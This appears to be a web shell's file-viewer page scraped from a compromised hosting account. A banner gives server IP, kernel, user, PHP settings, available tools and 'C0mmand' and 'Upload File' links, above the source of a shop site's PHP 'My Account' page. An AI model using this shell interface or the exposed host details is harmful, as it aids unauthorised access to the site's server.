Server IP : 103.53.40.154 / Your IP : 18.217.4.250 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/rajwadahouse.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); include_once('admin/config.php'); if (!isLoggedIn()) { $_SESSION['msg'] = "You must log in first"; header('location: login.php'); } ?> <!doctype html> <html class="no-js" lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>My Account</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include "top-links.php";?> </head> <body> <div id="main-wrapper"> <?php include "header.php";?> <div class="page-banner-section section bg-image" data-bg="<?php echo $wspath?>assets/images/bg/breadcrumb.jpg"> <div class="container"> <div class="row"> <div class="col"> <div class="page-banner text-center"> <h1>My Account</h1> <ul class="page-breadcrumb"> <li><a href="<?php echo $wspath?>">Home</a></li> <li>My Account</li> </ul> </div> </div> </div> </div> </div> <div class="my-account-section section pt-100 pt-lg-80 pt-md-70 pt-sm-60 pt-xs-50"> <div class="container sb-border pb-100 pb-lg-80 pb-md-70 pb-sm-60 pb-xs-50"> <div class="row"> <div class="col-12"> <div class="row"> <div class="col-lg-3 col-12"> <div class="myaccount-tab-menu nav" role="tablist"> <a href="#dashboad" class="active" data-bs-toggle="tab"><i class="fa fa-dashboard"></i> Dashboard</a> <a href="#orders" data-bs-toggle="tab"><i class="fa fa-cart-arrow-down"></i> Orders</a> <a href="#download" data-bs-toggle="tab"><i class="fa fa-cloud-download"></i> Download</a> <a href="#payment-method" data-bs-toggle="tab"><i class="fa fa-credit-card"></i> Payment Method</a> <a href="#address-edit" data-bs-toggle="tab"><i class="fa fa-map-marker"></i> address</a> <a href="#account-info" data-bs-toggle="tab"><i class="fa fa-user"></i> Account Details</a> <a href="<?php echo $wspath?>logout.php"><i class="fa fa-sign-out"></i> Logout</a> </div> </div> <div class="col-lg-9 col-12"> <div class="tab-content" id="myaccountContent"> <div class="tab-pane fade show active" id="dashboad" role="tabpanel"> <div class="myaccount-content"> <h3>Dashboard</h3> <div class="welcome mb-20"> <p>Hello, <strong><?php if (isset($_SESSION['user'])) : ?> <?php echo $_SESSION['user']['cust_name']; ?> <?php endif ?> </strong> </p> </div> </div> </div> <!--<div class="tab-pane fade" id="orders" role="tabpanel">--> <!-- <div class="myaccount-content">--> <!-- <h3>Orders</h3>--> <!-- <div class="myaccount-table table-responsive text-center">--> <!-- <table class="table table-bordered">--> <!-- <thead class="thead-light">--> <!-- <tr>--> <!-- <th>No</th>--> <!-- <th>Name</th>--> <!-- <th>Date</th>--> <!-- <th>Status</th>--> <!-- <th>Total</th>--> <!-- <th>Action</th>--> <!-- </tr>--> <!-- </thead>--> <!-- <tbody>--> <!-- <tr>--> <!-- <td>1</td>--> <!-- <td>Mostarizing Oil</td>--> <!-- <td>Aug 22, 2018</td>--> <!-- <td>Pending</td>--> <!-- <td>$45</td>--> <!-- <td><a href="cart.html" class="btn">View</a></td>--> <!-- </tr>--> <!-- <tr>--> <!-- <td>2</td>--> <!-- <td>Katopeno Altuni</td>--> <!-- <td>July 22, 2018</td>--> <!-- <td>Approved</td>--> <!-- <td>$100</td>--> <!-- <td><a href="cart.html" class="btn">View</a></td>--> <!-- </tr>--> <!-- <tr>--> <!-- <td>3</td>--> <!-- <td>Murikhete Paris</td>--> <!-- <td>June 12, 2017</td>--> <!-- <td>On Hold</td>--> <!-- <td>$99</td>--> <!-- <td><a href="cart.html" class="btn">View</a></td>--> <!-- </tr>--> <!-- </tbody>--> <!-- </table>--> <!-- </div>--> <!-- </div>--> <!--</div>--> <!--<div class="tab-pane fade" id="download" role="tabpanel">--> <!-- <div class="myaccount-content">--> <!-- <h3>Downloads</h3>--> <!-- <div class="myaccount-table table-responsive text-center">--> <!-- <table class="table table-bordered">--> <!-- <thead class="thead-light">--> <!-- <tr>--> <!-- <th>Product</th>--> <!-- <th>Date</th>--> <!-- <th>Expire</th>--> <!-- <th>Download</th>--> <!-- </tr>--> <!-- </thead>--> <!-- <tbody>--> <!-- <tr>--> <!-- <td>Mostarizing Oil</td>--> <!-- <td>Aug 22, 2018</td>--> <!-- <td>Yes</td>--> <!-- <td><a href="#" class="btn">Download File</a></td>--> <!-- </tr>--> <!-- <tr>--> <!-- <td>Katopeno Altuni</td>--> <!-- <td>Sep 12, 2018</td>--> <!-- <td>Never</td>--> <!-- <td><a href="#" class="btn">Download File</a></td>--> <!-- </tr>--> <!-- </tbody>--> <!-- </table>--> <!-- </div>--> <!-- </div>--> <!--</div>--> <!-- Single Tab Content End --> <!-- Single Tab Content Start --> <!--<div class="tab-pane fade" id="payment-method" role="tabpanel">--> <!-- <div class="myaccount-content">--> <!-- <h3>Payment Method</h3>--> <!-- <p class="saved-message">You Can't Saved Your Payment Method yet.</p>--> <!-- </div>--> <!--</div>--> <!-- Single Tab Content End --> <!-- Single Tab Content Start --> <!--<div class="tab-pane fade" id="address-edit" role="tabpanel">--> <!-- <div class="myaccount-content">--> <!-- <h3>Billing Address</h3>--> <!-- <address>--> <!-- <p><strong>Alex Tuntuni</strong></p>--> <!-- <p>1355 Market St, Suite 900 <br>--> <!-- San Francisco, CA 94103</p>--> <!-- <p>Mobile: (123) 456-7890</p>--> <!-- </address>--> <!-- <a href="#" class="btn d-inline-block edit-address-btn"><i class="fa fa-edit"></i>Edit Address</a>--> <!-- </div>--> <!--</div>--> <div class="tab-pane fade" id="account-info" role="tabpanel"> <div class="myaccount-content"> <h3>Account Details</h3> <div class="account-details-form"> <form action="#"> <div class="row"> <div class="col-lg-6 col-12 mb-30"> <input id="first-name" placeholder="First Name" type="text"> </div> <div class="col-lg-6 col-12 mb-30"> <input id="last-name" placeholder="Last Name" type="text"> </div> <div class="col-12 mb-30"> <input id="display-name" placeholder="Display Name" type="text"> </div> <div class="col-12 mb-30"> <input id="email" placeholder="Email Address" type="email"> </div> <div class="col-12 mb-30"><h4>Password change</h4></div> <div class="col-12 mb-30"> <input id="current-pwd" placeholder="Current Password" type="password"> </div> <div class="col-lg-6 col-12 mb-30"> <input id="new-pwd" placeholder="New Password" type="password"> </div> <div class="col-lg-6 col-12 mb-30"> <input id="confirm-pwd" placeholder="Confirm Password" type="password"> </div> <div class="col-12"> <button class="save-change-btn">Save Changes</button> </div> </div> </form> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <?php include "footer.php";?> </div> </body> </html>